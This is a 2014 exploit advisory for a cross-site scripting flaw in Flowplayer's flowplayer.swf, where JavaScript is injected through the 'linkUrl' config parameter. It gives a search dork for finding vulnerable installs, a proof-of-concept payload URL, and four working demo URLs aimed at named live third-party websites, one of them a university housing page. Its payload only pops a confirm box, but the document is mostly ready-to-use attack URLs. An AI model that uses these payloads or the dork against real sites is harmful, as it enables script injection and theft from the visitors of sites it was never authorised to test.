# Flowplayer (js & swf) XSS Vulnerability
# Date: 15/5/14
# Vulnerablity Risk : High
# Vulnerable Sofware: http://flowplayer.org/
# Dork : inurl:flowplayer/flowplayer.swf
# Author: Muhammad Adeel aka Innoxent Stoker
# Founder | Urdusecurity.blogspot.com

# Vulnerability

xss is Cross Site Scripting vuln Which actually interacts With Either
WebServer or The Clients and its Highly Dangrous Vuln Because it May Lead
to Data Stealing and Other Stuff Like That.

# POC & Exploit

xss is in flowplayer.swf Config Command Which is Executing xss while Giving
"linkUrl" ParaMeter


http://Vulnerablesite.com/flowplayer.swf?config={"clip":{"url":"
http://stream.flowplayer.org/bauhaus/624x260.mp4",
"linkUrl":"javascript:confirm(String.fromCharCode(88,83,83));"}}&.swf


# Demo

http://www.advancementprojectca.org/sites/all/modules/flowplayer/flowplayer/flowplayer.swf?config={
"clip":{"url":"http://stream.flowplayer.org/bauhaus/624x260.mp4",
"linkUrl":"javascript:confirm(String.fromCharCode(88, 115, 115, 32, 80,
111, 99, 32, 47, 32, 77, 117, 104, 97, 109, 109, 97, 100, 32, 65, 100, 101,
101, 108, 32, 97, 107, 97, 32, 73, 110, 110, 111, 120, 101, 110, 116, 32,
83, 116, 111, 107, 101, 114, 32, 47, 47, 32, 85, 114, 100, 117, 83, 101,
99));"}}&.swf


http://www.dancelessonsaustin.com/template/fredwoodlands/js/flowplayer/flowplayer.swf?config={%22clip%22:{%22url%22:%22http://stream.flowplayer.org/bauhaus/624x260.mp4%22,%20%22linkUrl%22:%22javascript:confirm%28String.fromCharCode%2888,%20115,%20115,%2032,%2080,%20111,%2099,%2032,%2047,%2032,%2077,%20117,%20104,%2097,%20109,%20109,%2097,%20100,%2032,%2065,%20100,%20101,%20101,%20108,%2032,%2097,%20107,%2097,%2032,%2073,%20110,%20110,%20111,%20120,%20101,%20110,%20116,%2032,%2083,%20116,%20111,%20107,%20101,%20114,%2032,%2047,%2047,%2032,%2085,%20114,%20100,%20117,%2083,%20101,%2099%29%29;%22}}&.swf


http://www.tier1personnel.com/template/default/js/flowplayer/flowplayer.swf?config={%22clip%22:{%22url%22:%22http://stream.flowplayer.org/bauhaus/624x260.mp4%22,%20%22linkUrl%22:%22javascript:confirm%28String.fromCharCode%2888,%20115,%20115,%2032,%2080,%20111,%2099,%2032,%2047,%2032,%2077,%20117,%20104,%2097,%20109,%20109,%2097,%20100,%2032,%2065,%20100,%20101,%20101,%20108,%2032,%2097,%20107,%2097,%2032,%2073,%20110,%20110,%20111,%20120,%20101,%20110,%20116,%2032,%2083,%20116,%20111,%20107,%20101,%20114,%2032,%2047,%2047,%2032,%2085,%20114,%20100,%20117,%2083,%20101,%2099%29%29;%22}}&.swf


https://housing.wwu.edu/include/flowplayer/flowplayer.swf?config={%22clip%22:{%22url%22:%22http://stream.flowplayer.org/bauhaus/624x260.mp4%22,%20%22linkUrl%22:%22javascript:confirm%28String.fromCharCode%2888,%20115,%20115,%2032,%2080,%20111,%2099,%2032,%2047,%2032,%2077,%20117,%20104,%2097,%20109,%20109,%2097,%20100,%2032,%2065,%20100,%20101,%20101,%20108,%2032,%2097,%20107,%2097,%2032,%2073,%20110,%20110,%20111,%20120,%20101,%20110,%20116,%2032,%2083,%20116,%20111,%20107,%20101,%20114,%2032,%2047,%2047,%2032,%2085,%20114,%20100,%20117,%2083,%20101,%2099%29%29;%22}}&.swf